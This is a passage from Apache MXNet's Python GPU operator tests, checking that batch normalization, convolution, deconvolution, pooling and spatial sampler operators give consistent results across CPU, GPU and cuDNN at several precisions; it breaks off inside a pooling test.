sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_disabled()
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
# 3D convolution NCDHW
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
syms = [conv_cudnn, conv_cpu, conv_gpu]
check_consistency(syms, ctx_list)
@with_seed()
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list, rand_type=np.float16)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. https://github.com/apache/incubator-mxnet/issues/11839")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear")
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list, rand_type=np.float16)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/11517")
@with_seed()
def test_pooling_versions():
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride, pooling_convention='valid',
global_pool=False, p_value=2, count_include_pad=True, tol=None):
ctx_list = []
sym_list = []
# PoolingV1 cpu
if 'pool_v1_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# PoolingV1 gpu
if 'pool_v1_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling cpu
if 'pool_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
# Pooling gpu
if 'pool_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=True, name='pool',
p_value=p_value, count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
name='pool', p_value=p_value, count_include_pad=count_include_pad))
# CuDNNPooling
if 'pool_cudnn' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, p_value=p_value, cudnn_off=False,
name='pool', count_include_pad=count_include_pad))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, p_value=p_value,
cudnn_off=False, name='pool', count_include_pad=count_include_pad))
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol)
def test_1d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20)
kernel = (4,)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False, p_value=p_value,
count_include_pad=count_include_pad)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True, p_value=p_value, count_include_pad=count_include_pad)
def test_2d_pooling(pool_type, p_value=2, count_include_pad=True):
data = (2, 3, 20, 20)
kernel = (4, 5)
pad = (0, 0)
stride = (1, 1)
if pool_type == 'lp':
